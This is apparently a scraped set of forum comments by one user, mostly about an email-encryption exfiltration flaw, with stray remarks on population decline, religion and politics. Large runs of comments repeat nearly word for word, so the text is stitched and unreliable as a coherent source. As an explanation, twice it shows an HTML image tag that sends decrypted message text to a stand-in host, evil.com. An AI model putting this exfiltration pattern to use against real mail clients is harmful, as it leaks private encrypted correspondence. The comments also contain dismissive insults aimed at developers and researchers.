Very obviously so. There are a lot of irrational nay-sayers on this very idea though. These are the people that want to stick to the human race expanding against all evidence that it is not a good idea, until it starts to rot away like a bacterial colony that has grown too far. There are those that say this has already started...
It is not about money. At some time, a society just reaches a state where it does not expand anymore and instead shrinks down slowly to a sane size. Most of the west is already there or getting there fast. It is not really a problem, you just need to manage this instead of ignoring it and sticking to the old recipes. Of course, the leadership of some countries is less well equipped to do that...
You can, and a lot of people try. It is just hugely unethical and has spawned the most evil movements the human race has ever seen. (Organized Religion, Fascism, etc.)
No problem in that case. This exploit depends on wrongly embedding the encrypted part of the email into html after decryption and then doing an external fetch of an image using it. Basically (simplified a lot), if your mailer transforms <img src="http://evil.com/[encrypted]"> to <img src="http://evil.com/my_secret_message">, then "my_secret_message" gets sent to evil.com as part of the query. The attacker would before that inject the http part into the non-encrypted part of the message.
For this to work, you need a whole lot of pretty extreme stupidity: - mixed encrypted+non-encrypted messages - broken mime decoding that just concatenates things together - broken decryption use that does not treat results from decryption specially - broken email display that fetches external links like images. - no message whole-message integrity protection in (partially) encrypted messages or ignoring error reports form that integrity protection
These are all faults on the side of the mailer, probably due to large enthusiasm, small skills, a mistaken belief that "new is better" and absolutely no understanding of software security.
Wait a minute. My understanding is that the attacker changed the ciphertext and got predictable plaintext to come out.
That would actually not be a problem. In Plublic-Key Crypto, the attacker can always do that, because anybody can encrypt messages for a recipient. The problem is a combination of broken MIME decoding in combination with ignoring an error message from PGP/GnuPG and a really stupid decision to load external content when an email is displayed.
It is not a flaw in PGP/GnuPG. It is a flaw in the email software, or rather several flaws in combination. The combination seems to be widespread unfortunately.
Virtue signalling does not involve accepting any real significant personal loss as part of the process. That one is called "personal integrity". But I guess you have no experience with that and hence cannot understand it.
Used to keep people friendly until they were large enough to show their true colors. Corporations lie and they lie about important stuff. So this is not really a surprise at all.
PGP/GnuPG also does no MIME parsing, which must be broken as well to allow the attack. This is 100% incompetent implementation of email software by people that are clueless about security.
I also have to say I find all the alarmists here a disgrace. Clueless, arrogant and panicky, a very bad combination.
This is 100% the fault of the email client implementations. FWIW, if you still use mutt or pine or alpine etc, you're safe for now.
Oh, yes. Mutt user here (at least for encrypted email), because I have never trusted these messed up insecure jokes that pass for email software these days. Automatically loading stuff from external places in this way is an instant security fail. Nobody with a clue is surprised this can be exploited.
Nothing is "guaranteed to be secure". Incidentally, it is not PGP or GnuPG that is at fault here. It is fundamentally broken and insecure HTML and MIME parsing in the email software affected. PGP/GnuPG is perfectly fine.
This should come as no surprise at all. Automatic decryption of emails is insecure, pretty much by definition. Anybody using that does not have security as it takes one tiny flaw somewhere else to exploit that. Also, automatically loading external stuff in an email reader is pretty much insane.
I agree, the behavior of these security "researchers" is really unethical and unacceptable. My initial reaction was that with an announcement this bombastic, it will likely turn out to not be an elephant but a mouse. And look, it is. And people with a secure set-up are not even affected, only people that use fundamentally insecure software in the first place.
On a related note, this is _email_! Automatically loading anything externally is just as insane as automatically opening attachments. Have the people writing this broken email software learned absolutely nothing from the past?
PGP is very much _not_ broken. Some wannabee mail software is badly broken in how it handles HTML, MIME and PGP integration. This is also not a surprise at all. There is a reason many of us still use mutt or elm or the like at least for encrypted email.
Indeed. This whole problem comes from crappy clueless implementations and crappy clueless defaults. Turning off PGP completely is entirely the wrong reaction.
And _that_ is a sane default. Do insecure things, be insecure. There is not even a story here except that apparently many makers of email software are really clueless about security.
I am a security expert and I would upgrade that to "extremely dumb" as in "completely clueless about security". And no, you are not wrong. Also, having a correct MIME parser or taking the warning about missing integrity protection seriously also works to solve this. This is a problem on the side of the mail software affected.
Caveat: I have not looked at the finer details. I use mutt as mailer for anything encrypted with lynx as html-to-text filter and are decidedly not affected by any of this.
The thing is that apparently most email software these days is badly broken and will not only gladly load external includes in HTML email, but also mess up the MIME parsing and ignore warnings about missing integrity protection. I feel pretty smug now that I am on mutt (and will remain on it as primary MUA), even though I had to add lynx as an HTML-to-text filter because some people feel it is acceptable to send HTML-only email. If this were just private email, I would have happily ignored these, but unfortunately it is business.
People continue to look for easy answers, even after it has been made amply clear to them that these do not cut it. The human condition at work...
Very obviously so. There are a lot of irrational nay-sayers on this very idea though. These are the people that want to stick to the human race expanding against all evidence that it is not a good idea, until it starts to rot away like a bacterial colony that has grown too far. There are those that say this has already started...
It is not about money. At some time, a society just reaches a state where it does not expand anymore and instead shrinks down slowly to a sane size. Most of the west is already there or getting there fast. It is not really a problem, you just need to manage this instead of ignoring it and sticking to the old recipes. Of course, the leadership of some countries is less well equipped to do that...
You can, and a lot of people try. It is just hugely unethical and has spawned the most evil movements the human race has ever seen. (Organized Religion, Fascism, etc.)
Naa, that would be rational, fact-based and forward-thinking. Cannot have that, must make America Great Again!
No problem in that case. This exploit depends on wrongly embedding the encrypted part of the email into html after decryption and then doing an external fetch of an image using it. Basically (simplified a lot), if your mailer transforms <img src="http://evil.com/[encrypted]"> to <img src="http://evil.com/my_secret_message">, then "my_secret_message" gets sent to evil.com as part of the query. The attacker would before that inject the http part into the non-encrypted part of the message.
For this to work, you need a whole lot of pretty extreme stupidity:
- mixed encrypted+non-encrypted messages
- broken mime decoding that just concatenates things together
- broken decryption use that does not treat results from decryption specially
- broken email display that fetches external links like images.
- no message whole-message integrity protection in (partially) encrypted messages or ignoring error reports form that integrity protection
These are all faults on the side of the mailer, probably due to large enthusiasm, small skills, a mistaken belief that "new is better" and absolutely no understanding of software security.
Wait a minute. My understanding is that the attacker changed the ciphertext and got predictable plaintext to come out.
That would actually not be a problem. In Plublic-Key Crypto, the attacker can always do that, because anybody can encrypt messages for a recipient.
The problem is a combination of broken MIME decoding in combination with ignoring an error message from PGP/GnuPG and a really stupid decision to load external content when an email is displayed.
Read the description of the problem again.
It is not a flaw in PGP/GnuPG. It is a flaw in the email software, or rather several flaws in combination. The combination seems to be widespread unfortunately.
No need. The morons making "modern" mailers just need to learn about the basics of security.
Virtue signalling does not involve accepting any real significant personal loss as part of the process. That one is called "personal integrity". But I guess you have no experience with that and hence cannot understand it.
Used to keep people friendly until they were large enough to show their true colors. Corporations lie and they lie about important stuff. So this is not really a surprise at all.
PGP/GnuPG also does no MIME parsing, which must be broken as well to allow the attack. This is 100% incompetent implementation of email software by people that are clueless about security.
I also have to say I find all the alarmists here a disgrace. Clueless, arrogant and panicky, a very bad combination.
This is 100% the fault of the email client implementations. FWIW, if you still use mutt or pine or alpine etc, you're safe for now.
Oh, yes. Mutt user here (at least for encrypted email), because I have never trusted these messed up insecure jokes that pass for email software these days. Automatically loading stuff from external places in this way is an instant security fail. Nobody with a clue is surprised this can be exploited.
Nothing is "guaranteed to be secure". Incidentally, it is not PGP or GnuPG that is at fault here. It is fundamentally broken and insecure HTML and MIME parsing in the email software affected. PGP/GnuPG is perfectly fine.
This should come as no surprise at all. Automatic decryption of emails is insecure, pretty much by definition. Anybody using that does not have security as it takes one tiny flaw somewhere else to exploit that. Also, automatically loading external stuff in an email reader is pretty much insane.
I agree, the behavior of these security "researchers" is really unethical and unacceptable. My initial reaction was that with an announcement this bombastic, it will likely turn out to not be an elephant but a mouse. And look, it is. And people with a secure set-up are not even affected, only people that use fundamentally insecure software in the first place.
Indeed. The recipient can just publish the email or send it to a 3rd party. You need to be able to trust people you send secrets to.
On a related note, this is _email_! Automatically loading anything externally is just as insane as automatically opening attachments. Have the people writing this broken email software learned absolutely nothing from the past?
PGP is very much _not_ broken. Some wannabee mail software is badly broken in how it handles HTML, MIME and PGP integration. This is also not a surprise at all. There is a reason many of us still use mutt or elm or the like at least for encrypted email.
Indeed. This whole problem comes from crappy clueless implementations and crappy clueless defaults. Turning off PGP completely is entirely the wrong reaction.
And _that_ is a sane default. Do insecure things, be insecure. There is not even a story here except that apparently many makers of email software are really clueless about security.
I am a security expert and I would upgrade that to "extremely dumb" as in "completely clueless about security". And no, you are not wrong. Also, having a correct MIME parser or taking the warning about missing integrity protection seriously also works to solve this. This is a problem on the side of the mail software affected.
Caveat: I have not looked at the finer details. I use mutt as mailer for anything encrypted with lynx as html-to-text filter and are decidedly not affected by any of this.
The thing is that apparently most email software these days is badly broken and will not only gladly load external includes in HTML email, but also mess up the MIME parsing and ignore warnings about missing integrity protection. I feel pretty smug now that I am on mutt (and will remain on it as primary MUA), even though I had to add lynx as an HTML-to-text filter because some people feel it is acceptable to send HTML-only email. If this were just private email, I would have happily ignored these, but unfortunately it is business.
And that is just it. This thing is way blown out of proportion and it is attributing blame to the wrong tool (and people).